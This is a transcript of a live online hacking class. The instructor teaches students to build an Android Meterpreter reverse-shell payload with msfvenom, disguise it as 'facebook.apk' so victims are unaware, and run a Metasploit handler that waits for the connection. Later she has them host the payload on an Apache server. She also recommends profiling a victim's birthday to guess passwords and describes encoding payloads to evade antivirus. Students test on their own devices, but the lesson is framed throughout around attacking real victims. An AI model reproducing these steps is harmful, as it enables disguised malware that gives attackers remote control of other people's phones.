Okay, thank you. Okay, so starting again here, MSF Venom dash help. All right, it gives you a list of command of everything you can do using what they call it, using the MSF, command. Now we have MSF Venom here, a Metasploit standalone payload generator. All right, so you can generate a payload not only for Android, you can generate for different devices, even if for Linux, you want to hack a Linux system, all right, you can do that. Even if you want to hack a Windows system, you can still use MSF Venom to do that. Now, this is where your footprinting comes in. Footprinting, more like gathering information gathering. This is where it comes in. So you have to know your targets. All right. Let's say I want to hack Ayo. All right. I have to know some things about her. Even to the lists of date of birth. It's really important because when you're performing a hack, all this little information needs to be known. So imagine maybe there's a place for password, and I'm like, oh, password. I need to do a brute force attack. It will be easier if I know her date of birth. I can just include it there, use it to create a word list. Because um, it is very unfortunate that so many persons use their birthday as their password or their PIN, especially ATM card. Most persons, whenever I just see ATM, first thing that comes to my mind is, oh, this person's PIN should be date of birth, you know. So it's very good to do our footprinting, knowing our targets, knowing our victim, so to make life easier for us, you would know where it's vulnerable and where it's not vulnerable, where it's strong and where it's weak, and we limit our scope of hack to that particular place that is very weak. All right, so with MSF Venom dash help, you'll get a list of all these, options, list of options. So you can go through it in your spare time. All right, go through it your spare time. So we have, so looking at this part, you see we have dash P for payload. All right, we have dash P for payload. So we're going to be creating a payload for Android specifically, right? For Android specifically. All right, so I'm going to clear this. Okay. Now, the command to create this payload is firstly MSF Venom. Now, since you're creating a payload, you're going to use dash P for payload. Don't mind this one, Isaiah. This was a different thing. If you look at my screen, you see that this is Java. There's a reverse shell, but a different thing, not even for Android. All right, so I'm creating for Android. So it's going to be Android. Please follow up as I'm working, all right? So in case you have an issue. So MSF Venom dash P for payload. So what we want is for Android, right? Yeah, we want for Android. So / Metapreter / reverse TCP. Reverse _ TCP rather. Are we following up? Can anyone hear me?
Yes.
Yes, I can hear you.
Okay.
So guys, let's know. So that if you run into an issue, it can be resolved on time.
Okay, so Metapreter / reverse TCP. Now we're doing reverse TCP because because we want to get a connection to our attacking machine, that's our machine here, stating that, oh, okay, the victim has clicked on our device and we have access now to do whatever you want to do. So reverse TCP. So Metapreter is just an advanced payload inside of the Metasploit framework. So reverse TCP, then a space, all right, and then we're going to do localhost. Now, localhost here is our machine. All right, our machine. Remember earlier I was saying check your IP address, all right, before we proceed. So you can always check it. So localhost, then your IP address of your Kali. All right, so this is where you're going to get the reverse connection whenever your victim clicks on the app. All right, you're going to get the answer here, the response here. So my own IP address is 192.168. We have forgotten dot 1.79. I don't know. Let me quickly check. Uh, so you can always check if config. Okay, yeah, dot 74 rather. Mine is dot 74. So it's 74. All right. So dot 74, that's your local host. Then we have local port also. So the local ports can be anything. You can use any 4 digits, right? So I'm going to say L ports as the port number. So I'm going to make use of let me see, random 5555, right? So I'm going to use 5555, right, as my local port. All right. So I need to output this. I need to output this payload somewhere. I need to save it somewhere. All right. So I want to save it on my I don't know, downloads. Let me see downloads because I always save all my things here. So downloads. Now you don't just say we have to create a path to this download. So remember I said yesterday to check the path to your downloads, just type in pwd. Now it's giving me this path because I'm already in the downloads directory. All right. So you can always check directory that you're in. Let's say ls. Instead of it downloads, I have ls. So this is what I have here. So let me just go back one space. Clear. So my roots here, if I do ls, I can see I have downloads, documents, desktop. So wherever I want to save it. So if you want to save yours on your desktop, you can just cd into the desktop, desktop this way. All right, and then do the pwd. So it's going to give you the path to your desktop, just in case you do not know how to navigate there. All right, so okay, I'm going to use my desktop now. I'm going to save it to my desktop. So the path I have here is /home/kali/desktop. So I can just copy this, right? Copy this and go back here. And I paste it here. So this is the path /home/kali/desktop. All right. And then I'm going to call it, I'm going to call this, now you can call your app any name you want. So the first one I did here, what did I even call it? Okay, the first one I did was Android APK. Okay. So I'm going to call this different name. So say slash, let me call it Facebook. It's facebook.apk. Right. Now, you're wondering why I'm saving it as facebook.apk. You're wondering why I'm doing that. Because I want my victim to be unaware of what I'm doing. So I'm going to call it facebook.apk. Now, what we're going to do today is just creating the payload and and sending it to our own device. You're not sending it to anybody, all right? But in a case whereby you want to do advanced exploits, you can always please just a minute, please. Please just give me a minute, please. Please just give me a minute, please.
Okay, why wait for special one? Do we have anyone who has gotten to this level? Do you have anyone who has gotten to this stage? Hello, guys. If you can unmute and speak.
Yeah, I'm
Has
waiting
anyone,
currently.
what do you say? MJ, what
I'm
do you say?
waiting currently.
Okay, yeah, okay,
Just
that's
naming
good.
the video.
Okay, so Bez, where are you? Janet, where are you? Mohammed, where are you? Waiting, where are you? Z, where are you? Have you gotten to that stage?
No, I'm not. I'm not there yet. Just trying
Okay.
to run up.
Okay, sorry, I'm back.
You have your card, right? You have your card, right?
Yes.
Okay.
Okay, so are we following? Do you have any issues?
I was
Do we have
asking them.
any?
Asking if
Okay,
it's currently that's where you are. So I think AMD.
okay, okay. Let's proceed if there's no issues. So if you're up to this point here, you can just press the enter button, right? So it's going to create. Okay, so if you look at my screen, I already have the payload 10,236. Do we have the same thing on our screen? Do we have the same output on our screen?
Oh yeah, let's talk. MG, is that what you have on your screen?
Do we have the same thing here? Please respond. Let me know we are on the same page.
Guys,
Is that can anyone hear me? Because I don't know why no one is saying anything. Can anyone hear me?
I can hear you.
I
Even
can
if we
hear
have
you. I'm not
Let's
there
just
yet. I'm still typing out my command.
Okay, yeah. So you can also respond like, oh, you can say you're not here yet or you're here, you know. You don't, I mean, so I'll know that we are following. Z, are you here?
I'm not sure, ZJ. I'm not sure.
Yeah, I'm
She's
here.
but
Yeah, I'm typing
I'm
my commands too.
Please, can we
oh,
please,
okay.
I'm
let's
typing
just
my command. I'm typing my
No
command.
problem. No problem. But I'd really appreciate if you respond whenever I ask. I mean, a yes or a no would do. So you won't just keep me hanging. I'm asking just so I know everybody's following. You know, that's why I'm always asking, are we following? Right. All right. So let me just wait. Whenever I get to this point, let me know. I don't want anybody to be left behind. All right. The class is supposed to be interactive. If your background is not noisy, you can put on your mic, you know, so you can ask questions whenever. Unless you have a noisy background, then you can turn off your mic. So this is the command, right? If I should minimize and go to my desktop, you'd see I have the APK file here. Yes. So look at my screen. You see there's an APK file called facebook.apk here. Now it's looking very, very, very blunt, just like this. But it can be modified, you know, add all those Facebook logos and all that to look like the real Facebook APK file, you know, but we all know it's a payload. So back to this. So I'm going to hold on a bit. Let me know when you get this command, when you get your payload. So remember the command is MSF Venom -p for payload. Then since you are creating for an Android, you are going to say Android /metapreter /reverse TCP because you are trying to get a reverse connection whenever our victim clicks on or install the app on their phone. All right. So this happened. Now you're seeing this app. Most times the attacker, there are so many ways to, you know, send this payload out there. There's so many kinds of payload you can create one for Windows, you know, Windows 10, Windows 11, and you'll be asking when should you create Windows 10 and when should you create Windows 11. You should create either of these, you know, or for Linux, you create them whenever you've done your footprinting and you know that, oh, my victim is using a Windows 10 or my victim is using a Windows 11. Now, you might create a payload for Windows 11, and your victim is using a Windows 10. It may not really work. Or your victim is using a Linux computer and you're creating your payload for Windows. It will not work. All right, it will not work. So you have to know your victim. All right, imagine creating a Windows payload for someone using an Android phone. Nah, it won't work, you know. It won't work. So that's why we do all the footprinting. All right, you do footprinting to know all these things. So then we have here, if you're looking at my screen, you see we have L hosts. And I said the L host here is the local host. That is our machine, because we're going to be getting the reverse connection to our own machine. All right. And then this port is local ports, you know.
Okay,
for
excuse me, please. Sorry to
Yeah.
cut you short.
No
So,
worries.
am I supposed to use what is it called? Desktop too, or I can use my downloads?
Anywhere you want to save it, all right? Anywhere. So now moving on, this part you have here is just a part to save your payload. All right, this is just a part to save your payload. So that's why you can see home, Kali, desktop, and facebook.apk. Now, if I should minimize this, all right, and then you go to, if I minimize this, you can see on my desktop, this is where the facebook.apk is, right? This is my payload. This is where I saved it. I created one earlier, right, called Android app. It was on my downloads. Where is it? Where is it? Okay, yeah. So the first one I created was Android app, and I saved it on my download, so it's here already. You understand? I saved it here. So this is just a path to where you want to save your This is a path where you want to save your what do you call it, your payload. Is that understood? Is that understood, Z?
Yes, understood.
Okay. Okay, so moving on. After we've created this, so before I proceed, have we created the payload? Have we created the payload?
Yeah, I'm on it. I just gotten my IP address.
Okay, no problem. So moving on, after you've done this and you've gotten your payload saved wherever you want it to be saved, you're going to go to the next command, which is msf console. Yes, msf console. msf console. And you press enter button. It's going to load your, it's going to start the Metasploit framework console. So msf console. msf console. Yes, so you'll be getting this. You'll be getting this on your screen. You'll be getting this on your screen. So I'm going to wait for us to do this or to get to this point. Acknowledge when you get to this point, please. And if you're having any difficulties, always let me know. So I'm still waiting. I believe we are all doing this, so I'm waiting.
Hello, guys. I hope you're all doing it. Do you have anyone who is lost or something? Jonex, have you been able to meet up?
Still downloading.
Okay. Okay, I'm downloading the other one. The APK, right?
It's
Yeah.
no hack selected, selection hack, Delvic from the payload, no encoder specified, outputting raw payload size. Is that correct?
Look at my screen. Look at my screen. Do you have?
Yes, that is what I have.
Okay, good.
Yes, that is what I have.
Okay, so if you have this,
No.
so if you have this already,
yes.
next thing you should do is msf console. If you have this already, so go to msf console.
Okay. Okay. All right. Okay, so it's saying starting the Metasploit. All right, I think I have what you have here now.
Okay, yes, that should be it. Or that is it rather. Aside Z, is anyone following up?
Yeah.
Hello? Tesharon.
Yes, I can hear you.
So, no as selected, selecting act so, and then fail to validate host, local host. That's the
Hold on. Do you have this on your screen? This part here.
Yes.
You've done that one.
MSF
no
Venom,
selected. Yeah. Exactly. So if you've done these parts, yes, now type msf console. This is the next thing you should type.
MSF console.
Yes. And then it will give you something like this. Yours might be different. You might not get the same design. yours might be different.
Yeah.
All right.
Go back to the MSF console. Let me see, please.
Just MSF console.
Console.
Ayomide, please close
I
this
think
door
the
for me.
Meta framework console, yeah. Wow. Meta, so yeah. I'm here now.
Are we all here now?
Yes.
Ayomide, close this door. And reduce the
Z,
volume
please
of that.
tell your media to close the door and you mute your mic also.
Yes, sir.
So are we all on this page?
Yes, I think so. Yes, I am.
You think so? I don't think so. You should be
Yes,
on the
I
same
am.
page.
Yeah.
Okay, so now if you look down, all right, if you look down, you'll see we have 2,437 exploits. We have 1,252 auxiliaries. We have 429 exploits, 1,471 payloads, 47 encoders. I don't know about these knobs. I'm always having issues with knobs, but 9 evasion. So, does anyone here have an idea what these things are? Anybody? Do you have an idea what these things are?
No, I don't have any idea. But it's like this evasion. Probably number of times you can evade your target.
Evasion basically bypasses security. You bypasses the security more like antivirus and endpoint detection and all that. So that's the evasion. So we have he have like that's 9 techniques to bypass antivirus, Windows Defender, and so on. You know, so encoders basically it's like when you make it look like it's not a virus or it's not a payload, because sometimes you might send a payload and the Windows security or Android security might say, oh, this should not come in, all right, this is a payload, this is harmful and all that. There are always security measures, you know. So, but when you encode it, all right, there's a possibility that it can bypass it. Now, this is not to say that once you encode it, it automatically bypasses your Windows defenders or Windows security or antivirus. No, you can encode and the antivirus will still find it or detect it, because the same way you are trying to bypass is the same way they are trying to make their security stronger. So you might, let's say for example, you try to encode it with okay, just a random encode it with, let's say, AAA, all right, and them already, because they are trying to be good at what they do in defending, they might also blacklist AAA. So whenever they see AAA, they'll be like, oh, this is a virus. I don't know if you understand. So you encoding it is not a guarantee that, oh, it's going to work. There are different ways to encode aside using this Metasploitable. All right. I have payloads I've created that bypasses Windows Defender. People say Windows Defender is very strong and all that. Well, to them it's strong, but I bypass Windows Defender. It doesn't even take time at all. All right, I can bypass it. I know how it's been done and all that, you know. So this one may not work for you. Another one may work for you. So payloads basically are the just like the way you've created for Android, you have for Windows, you have for Windows 11, Windows 10, for Apple and all that. All right. Same way, that's the same numbers of payloads they have. And the exploits more like things you can do with this payload you've created. So after we have this, since we have this on our screen, moving on, we're going to do this. We're going to type, where's my cursor? So we're going to type use exploits. Please spell correctly, because if you don't do it correctly, you might have an issue. So use exploits multi slash handler this way, multi handler. If you want to know what all these things are, meet Ayo. She's going to tell you what to do to have access to all the information you need to know. All right, so use exploits / multi / handler. All right, use exploits / multi / handler. Then hit the enter button. Are we here?
Yes.
Okay, so you're going to say using configured payload, generic shell, generic / shell reverse TCP. So now we have to set our payload. We have to do this. So we're going to say set payload / payload space first. Android rather, and ROID, right? Android / meta Peter, all right, / reverse _ TCP. Can you see my screen properly? Are we following? If you have any question, feel free to ask. So set payload
Yes,
Android
following.
yeah. And
Yeah, I
then
said I'm
press
following.
okay, and press the enter button. All right, so to check if everything you're doing is going well, you can always do show options. I mean, whenever. So let's see show options. Just listening ports. I still have my listening ports. Sorry, I think I have to close this. Sorry, Control C. Okay. So let me do this again. Show option. What is saying? Options rather. Okay. So after this, you can always say set L hosts, local hosts. So local host, remember, it's your IP address. So you're going to set the IP address to your local, the local host to your IP address. So mine was 192.168.1.74, I think. 74. I think it should be 74. All right, so you can set it and then hit the enter button. So you can see local hosts. So you can see local host is 192. So let me set my sorry. Set. You don't have to do this other one I'm doing. I'm doing this because 555. Okay. So the reason I'm doing this set L ports here is because I already ran this Metasploitable, all right, and the listening port was 444, so it's still listening to that same port. All right, that's why I'm trying to change it to the current one which I did. So if you see here, the listening port is 555. I want you to listen to the current one I'm working on, so you shouldn't have an issue. So doing this, I can also try to check again if everything is all right. So show options. All right, so if you type the show options, you see that local host should be your IP address and the local port should be the ports which you specified earlier. Do we have this on our screen? Do we have this? Hello.
Working on
Let's
it.
just be sure.
Okay. I'm waiting. So let me know when I get to this point.
So yes, I'm there now.
All right. Z, also, I'm waiting for you. Is everyone else following?
Yes, I have typed my local host. Do I need to type my local port too?
Type show options. Type
Show
show
options,
options and
okay.
see, yeah, and see if you have this part here. If you have the listening pods and the hosts.
Okay.
Are they there?
Yes.
Okay, good. So if you have that now, all right, all you have to do is to type exploits, all right, OIT, all right. Just type in exploits this way and hit the enter button. Just a minute. XPLOIT. Okay, good. Now, can you see what is showing on my screen? Started a reverse TCP handler on this IP address and this port. So
Yes, it's
our
showing the
payload
same
is
thing,
set.
right?
Yes. So our payload is set. By the way, has anyone installed the, what do you call it? Has anyone installed the Android?
No, I've not installed it.
But listen to me and listen to
I should just install
Okay.
it on the Kali.
Yeah, install it on the Kali the same way you install your, on the VM rather, the same way you install the
On the
Kali.
VM.
Yes, but instead of picking Linux and other things, you should pick Android.
Correct.
Do you understand?
Yeah. So I start on the inside the Kali suite, or I want the Android and then automatically.
No. You go to your virtual machine. The same way you
Virtual
install,
machine.
yeah, go to your virtual machine and click on Z new, yeah, and then install it. Yes.
Voila. Let me try that now. Then it's fully
Hello,
downloaded.
special one.
Yes, ma.
Special one, please. What I see here initially, I saw one red mark like a note saying handler failed to bind to 192,
Because
like my host.
you have done something wrong. That's why it's failing. You have done something wrong.
Then it's now say again in another line, it said started reverse TCP handler on 000444.
Because you've done something wrong. Now, kindly share your screen. Let me see what you've done wrong. Before hold on, before you share your screen, do you have all your windows open? If yes, please close all those other windows.
Yes, sir.
Please close all those windows first before you share your screen. All right. So I think it's Ahmed, right? Ahmed, removed. Oh, God. Hello. Can you hear me?
Yes, I can hear you.
Okay. I think it's Ahmed that has installed I don't know who has
Okay, they
installed
don't
it.
Kukumba, for God's sake.
Hafiz,
Who
not
installed?
Ahmed. No, you've been calling
Okay,
Ahmed.
what's your name, please? I'm seeing just BES.
Hafiz.
Sorry. Please, what's your name so I can just call you by your name?
Call me Hafiz. Hafiz. No, not Ahmed.
Okay, no problem. I've heard you. Thank you. So hold on, I'm trying to look at what she has been doing. Scroll up, please. Scroll up to the top. Z, kindly scroll up, please. To the top. Go to the top. First things you did. I want to see everything you've done. Okay, from here, Android interpreter. Hold on. Let me be sure that you're following. Let me say Venom. P Android interpreter, TCP, all hosts.
Port is plenty.
Exactly. I just noticed it. Your L port, your local port is like 5 is what? 3 is triple. 5 is no. You have like 5 fives there. 5 fives. Can you see that? Can you see your local port is 5555, and then you're binding it to 4444. Why are you confusing the Metasploit now? Z, can you see what you're doing? Hello, Z.
Z,
I'm saying that my host is correct, but my local port is what is having issue, right? This 5.
Exactly. Yes,
I
your
just see
local
it
port,
now.
yes.
Yeah, I
Yes.
intended to press 4-5. Unfortunately, it's 5. Okay.
Did 5.
So
And after I did 5, scroll down. After you did the 5 fives there, scroll down.
okay. Should I keep scrolling?
Yes, keep scrolling, yes. The local port here is still 444. You have to change it to 55. So all you have to do is start all over again. I'll wait. You already have it on your screen. So you know that where you made the error was the local port. All right. So do this part. All right. Create another payload. All right. Create another payload and set your port. You can use any number of your choice. All right. Any number of your choice. So create it. You can use a different name also, so you won't get confused on which one. So you can use maybe twitter.apk, anyone. All right. So I remember I said the one I'm using Facebook is just maybe confuse my victim and all that. All right. So you can change your local port to a random number. You can use 7777. That's 4 sevens. All right. And then once you get to this part, let me know. So I'm going to tell you what to do. All right. So now if you notice, I had my L port as 4444, but I had to change it again. All right. I had to change it to 555 here using sets local port to 555. You understand? So that was why I said use this use the show options to check if this part here is correct. Remember, I was saying it's use show options to check. So once you've done that, once you've done these parts, where is it? Once you've done all these parts here, the use exploits multi-handler, In fact, you know what's going to happen? Once you're done with this first part, the first part here, just let me know. So we'll work together. Do you understand? Z.
Okay.
Hello, Z.
Okay. Yes, I'm here. Okay.
Okay. So for those of us that are here now, so you can see it's saying started reverse TCP handler, and it shows you the local hosts and the local ports. Now, all you have to do, send the APK file, all right, that you have created. I can't send mine. Don't know why my USB is not connecting. But anyway, so send this file here, this facebook.apk, send it to your phone. It's not going to harm your phone, all right? It won't do anything at all to your phone. It's a regular app, but what you should know that once you install it, it won't show anything, all right? It's not going to show anything at all that, oh, there's something running. It won't show. You can install it whenever you're done. All right, so send it to your device and then click on it. Once you install it, you'd notice that was this. So once you install it, you notice that on this part here, right, on this part, you see something like your IP address of your phone would appear here to show you that, oh, there's a connection now. It has gotten a connection. Do you understand? You're going to know that, oh, there's someone has clicked on this or someone has installed this stuff here. Are we doing that? Are you currently working on that? And if you're not sending it to your what do you call it, your phone, you can also just install the Android and send it there. All right. So there are kind of limitations. If you're using your VMware, that's the Android on the VM, you may not get a lot of commands because it's a VM, so you won't get a lot of commands. All right, let me see if I can even send mine. No, I always get issues connecting. Let me see if it's going to work. Doubt this one. Okay. Mine doesn't work. Oh, I stopped it. Are we still here? Is anyone installing the VM? Installing the Android? Oh, should here. Okay. Let me see. Okay, I think I can move this. Is anyone installing it?
Hello, do you have any other person doing this? Please let's respond. At least let's know the progress.
Please respond if you're doing it. If you're not, also respond. Let me know.
Yes, on
We have
this
to
side, I'm trying to
Yeah.
install it on an Android device.
I'm not doing
Babs, are you trying it? Bez, I don't know the person's phone name. NG. Quentin.
Yes, ma. I'm here.
Okay, are you trying it? I just want to know if you guys are trying it, so let's know what's up.
Hello, special one.
Yes, I can hear you.
I'm having issue installing it. Let me see the error message. So when it's asking for guest operating system, I pick other instead of Linux, Abi.
Do you have
Firmware.
do you, I'm trying to install it on my phone. See if it's going to go through.
When I install it on the phone or the system?
On your phone. On your phone. So what did you say? If you should install it where?
My system on the firmware now.
Yes,
The Android.
yes. Yes, please.
So I've picked the Android. Then, so I don't know which on, and then the guest operating system. I should pick others. Abi the same Linux.
Do you have, is there Android there?
No, I'm seeing Microsoft, Windows, Linux, and others.
Sorry, hold on. Can you share your screen, please?
Yes.
Share your screen, please. So
Yes.
we see it together.
I see.
Okay. Click on version. Click on the version. Let me see. The drop down here.
Oh.
Scroll up. See if you find Android here.
No, I've tried to do that.
Just type A. Press A. Press A. Your keyboard.
No way.
Sorry, go back again, please. Go back. Back here. Okay. Next. This is just 1 minute, please. Operating system, Linux. Click on Linux. Can you hear me? Click on Linux here. The drop down, go to the drop down again. Keep going up. Do we have Android here? No, I doubt. Sorry, just a minute. Let me figure this out. Do we have order? If you have order, you can just click on order. No, not, I mean, are the Linux and, oh, right. Just give me a minute. Let me figure this out from my own end. Just 1 minute. Still share your screen. I'll let you know what to do. Right. Okay. Okay. Um, click on click on order. Click on order. Then change this MS-DOS to order 64 bits. Look at order 64 bits there. Yeah, click on it. Then next, yes. Machine name, can call it Android. Change the order, change to Android, yeah. Yeah, next. This should be enough. You can increase the disk size a bit. Okay. 10 should be enough. Next. Finishes. Have you clicked on finish?
No, likely.
Yeah, click on finish. Okay. Okay, play machine there. Let's see. Hope everyone else is following. So whenever you're doing your installation, you wouldn't have so much issues.
I think most of people on this call. they are not here. Chinozo, are you here? MJ, are you here? Okay, Z is
Sorry, operating
working.
system not found.
Present, no.
Okay, you're present. So are you trying it? Do you have your PC active?
Yeah.
Babs.
Yeah,
Babs
I'm
Babs
following.
does not at all.
I'm here.
Okay. I've not heard from you, Daza. So are you trying it?
No, yeah, my PC has a problem.
Oh, sorry
I'm
about
just
that.
following. Mm.
This BS, right? Abis. Okay, yeah. Please, I want you to restart the process again. Let me see what you did at the beginning. It's not supposed to show this.
I should start the process again.
Yes, change. Say the guest
Oh.
operating system is not installed. Like start it again. Let me see. I mean the installation process. That's what I mean.
Yes, yes, sir. So go back to the yeah.
Sorry, hold on. Did you extract it? Hold on. Did you extract it? Can you hear me? Did you extract it?
I started it.
Do you need to extract this? That's what I'm seeing. Sorry, go back. Okay. Feature disk file. Okay, proceed with this, yes. Proceed, please. Select the, can you go back? Go back, please. No, not cancel, like go back here. Go back again. Select that the zip file. No. Go back. Select the zip file that I want. Click on the zip file, then click on open. Yes. Proceed with this. Order, click on order. Then order 64. Here, proceed Android here. Already exists. Click on OK. Just add one D to the front of that Android. Just add D. No, not this one. To the part, the location. No, not that. Not this one. The location here. Yes. Yeah, just add there something like that. Okay, increase the storage. Okay, finish. All right. This should work. I hope this should come this time around. Oh dear God, existing. The cache business system was installed. Cache system was installed. Always having issues with installations. If you can send it to your host machine, please do. That's your phone. Please do. I don't know why I'm experiencing this installation errors now. Can anyone hear me? Has anyone installed it? Is anyone having the same issues?
Hello?
Yeah,
I
I
will
said, is
start the
anyone having
virtual
this?
machine. Why doing it at the back end? Let me just exit the sharing. Let the
Okay,
class
that's
continue.
fine.
I will continue from the past.
Okay, Android-X.
Update you.
Okay, let me look for another link. Android, Android. Please hold the bits on support Android. I'm trying to get another one that is easier to install. Okay, on Android on your PC, right? Copy link address. Please hold a bit. I'm trying to get another version. I think would be better. Copy link address. Okay, so check the WhatsApp group, right? I'm going to drop another one here. Okay, so I'm dropping a link. See the same link. Box. All right, so I just dropped a link to a new link here, so you can check out this other link. Maybe this should work. Right, I really don't know why this other one is not working. So far has I guess we are all on these same parts here. Aside Abdi's, is there any other person trying to install the Android?
Yeah, no, but I'm on that part where I have to start my handler. It has given me the correct thing now.
Okay, you've done the exploit.
Yes.
Okay, it's giving you correct thing now. Okay, so try to I don't know how strong your network is, but Abis, the other part, the new link I dropped in the WhatsApp group, all right, you can use that one to download this Android. I think this should work better. I think they should work better.
No, Allah. I'm downloading it right now.
Okay, no problem. So now you have your reverse TCP handler on this your IP address and port number. So now you can easily send this APK file to an Android device. So you can send it to your Android device to test and see if it's working. So while you're still what do you call it? Trying to download, you can also send it to your mobile device to see if it's going to work properly.
Are you telling me all those things?
I'm saying generally. So those that
Okay,
have
because I
gotten
don't
to
know.
this
I don't know
point,
what to do next from this point.
yeah, you can. I'm saying the APK file that you've created, all right, you can send it to your mobile to see if it's going to work. Like send it to your mobile, try to install it, and see if you're going to get a reverse connection here on your PC. Do you understand? Do you understand?
Yes. What I want to say is the reverse connection is given to me is just like this IP address slash where my port number. Is
What
that
is on
all?
my screen right now? Like what is on my screen right now? Is it what you're getting?
Yes. Started
So
reverse.
yeah, it's just waiting. It's just waiting for a connection. It's just waiting for someone to click on the link, and that's it. That's all it's
Okay.
waiting for. Click on the link, and that's it. Once someone clicks on it, yeah, you get that connection.
Okay. So
So
I'll just copy this and send it to my phone.
yes, please. The reason why I can't download this is let me share my entire screen so you'd see what I'm facing here. I have a lot of things on my PC. Where's share? Okay, so if you look at my screen right now, right, see my downloads, it's saying out of storage space. So I can't really download anything anymore. You can see telling me out of storage space. This is the reason why I can't download it. I would have loved to, try it out. I had it earlier, but I have a lot of things on my PC, like a lot. So that's the reason. So bear with me for not testing it out on my own PC, So let me get that. We understand up to this point, right? We understand up to this point. Does anyone have a question? Any question, please?
So
Any
I
question,
sent
please?
the Facebook APK to my Android device, but
Yeah.
okay, yeah, I installed it and I do not see any changes on
Wait,
the
you installed it correctly, like just installed it and you're not seeing any reverse TCP handler.
No, I don't see anything like that. And by the way, like on the Facebook APK, there's
Yes.
this main activity just by where the size of the families. I don't know
So I can
why
barely hear. Sorry,
that.
your line is, your voice is breaking. What did you say, please?
Okay, can you hear me now?
Yes, I can.
Okay, I said I installed the Facebook dot on my Android mobile device, but I don't seem to be getting any reverse connection on my ID.
Can you kindly share your screen, please? Oh, dear God. Kindly share your screen.
Okay, just a second.
Imagine the spirit of unity. Okay, this is your screen, right?
Yeah.
So, correct. All right. Okay. So on installation, you had nothing working at all.
Yes. And even clicking, trying to launch the APK on the phone does not respond. It's just, you just click and
Yeah,
nothing happens.
it's not supposed to respond actually. It's not supposed to respond.
Oh, okay.
Yeah. Thinking of the possible reason. Invasion. Hold on. Let's see. For invasion. Hold on, I'm thinking of the possible reason why it's not working. Oh, why do I get this feeling? Okay, I think I have an explanation to that. Let's okay, let's do something. While you're still sharing your screen, all right, open up another terminal. Let's try something differently. Open up another terminal. Okay, now what I want you to do here is create the same payload, all right? Create the same payload, but when you're sending out the outputs, all right? When you're sending output, I want you to send it to a server. I'm going to give you, okay, let me just paste the link to you. It's just the same thing here, but the difference would be in this server. Just hold a bit, please. Hold on, let me just send this to you. Okay, I'm going to drop it in the chat, all right, in the WhatsApp group. So output should be /var/www/html so APK. Okay, now if you look at the charts here, I sent you. I dropped a link, or is it like a text rather, where you see the APK name, all right, change it to the app name that you want. That's if it's facebook.apk or whatever. That's why I'm putting APK name. All right. So do it now.
Like,
Now, what we are going to do is
where
we're
did
going to
you
send
send the
to
link?
the WhatsApp, yes.
Oh,
So yeah,
please, can you
I'm
send it
raising.
to the chat box here instead?
Okay, please, I'll do that. Hold on. Okay, it's done. So the reason why you're not getting that connection, right? I think is because it needs to be hosted on a server, all right? There needs to be some modification. Need to be some modifications, all right? So now let's host it on our local host server, all right? Our MySQL will be Apache server. We're going to host it on Apache server. It's going to be easier, I think,
You said I should
on
change
Apache
the
server.
APK name, right?
Yeah, that APK name, save it to what you want, like let's say facebook.apk, under.apk, something like that.
Ah,
Yeah.
no, I think am I not supposed to change the address also?
IP address also, yeah. So change the IP address here.
Yeah.
See your IP address. Just allow it to load, then you can cancel it and rerun it again. Or you cancel it already. You can clear your screen before you proceed. Yeah. So use the back arrow key, like the back arrow key to move. So after changing this, you can use the back arrow key to move to the IP address section.
The port number is still remains.
Sorry?
The port
Yeah, you
number still
can.
remains
You,
555, yeah.
yeah, you can use the same port number if you wish. Yes. So hit the enter button. Let's see. So basically, what this is going to do is going to create this APK file on the server kind of, so it's easier for you. So there's a server where you can get all the reverse shell.
Sorry, by the way, why this is loading? Can I quickly ask? Okay, it's done.
Okay, yeah, so this is done now. I want to do this. Open up a different terminal here and type service Apache 2 status. Just open another terminal. On the top, yeah, just you just
Yeah.
see the tab. See the tab key now. Just the same terminal you're using. Just click the tab
Okay,
to
okay.
create another tab. Yes. Yes. So do service space Apache 2 status. Space status here to be sure that the Apache 2 service is running.
Like this?
Enter. Yes, yes. Oh, it's disabled. Okay. How do I even enable this again? Hold on. Sorry. Uh, just a minute. Just 1 minute, please. Okay, do this. Do sudo system ctl start Apache 2. That should work.
Do I cut out of this?
No, you don't have. Okay, yeah, I can end this. Just do Control C. I think the Control X. One of them should work. Yeah. So let me just paste it in the chat. Ah, that's his status. Sorry. This start I did. Sorry, that's the wrong command. Yeah. Okay, the next one is the correct one. So look at the next one. Hit the enter button. Now do that. Just arrow key up twice. Let's check the status again. Yeah. Enter. Okay, yeah, so it's running now. Okay. Okay, now, so if this is running, you have to send, how do we do this now? Sorry, hold on a minute. Where was this? Look for where this is installed now, all right, and then try to use it again. It's going to work this time around because the payload is now being saved on the server, so you should get a connection. Just 1 minute. Let me quickly. By the way, Abiz, are you done installing the new one I sent to you, the new link?
Yeah, I'm just starting now. I just finished downloading now.
Oh, you just now starting to download it.
It's just been downloading now. I just want to install now.
Okay. Okay, please, kindly share your screen. Let's do the installations together. So hold on a bit. The MG right here. MG, hold on a bit. Let me watch Abiz install this.
Thank you. Wow. Can you see?
Okay, yeah, I can see. Installer digs image now. Click on the what do you call it? Okay, this is the one you extracted, right? Is this the one you extracted? Can he hear me? Proceed.
Yeah, I
Open.
can hear you. Yes, I'm asking.
Okay.
This is the
Okay,
new one
open.
now. Yeah.
Okay, open. Let's see. Order. No, order. Order, not Linux.
Then to change the path. Or it's just
Yeah, add underscore. This will give an error. Just give an underscore in front of it. Yeah, next. Please, no errors this time, please.
I hope so.
Please, no errors. Please.
Save money.
You know, boot file system again. Haba. We always having issues in installing. Don't even know what to say again.
Is it?
Use the, what do you call it? Use the unextracted file, that's the zip file, instead of the extract, instead of clicking on the.
Oh, it doesn't come in zip. Oh. This is how the two comes. This is the former one. This is how it came. Yeah.
It didn't come in zip file.
And then it's even 0. Oh, let me see. Right.
It should come in a zip file, not like that. It should come in a zip file.
So let me check. Has not finished.
Okay.
Oh no, it's still going on. Oh, the download is still going for the new one. So that's it.
Oh, you've not even, it has not even finished installing. Oh, that's why now.
That's not finished downloading. No.
Yeah, that's why it's giving this thing. It has not finished installing.
Yeah. Downloading. It has not finished downloading. So
yeah.
I just saw that the MB9 just 0. So you have to wait for it to flow.
Yeah, but this one is supposed to work. It's not supposed to give an issue.
Voila.
So yeah.
So after installing, what's also come up after finishing the?
It's supposed to install like
I have the APK on my desktop.
Yes. It should just appear like the normal phone on your desktop, you know, the way your phone is.
Yeah.
So we use it normally for testing. So that's basically it. So if you just come up like a normal phone, has the call button and all that.
I tried the installation after the download ends now. I have like 8 minutes left now for the download.
Sorry?
I said I'm having like 8 minutes left for the download now. So let's just wait for the download to finish, then I will run it.
Okay, Z, from your own end, do you have any issues also?
Still downloading.
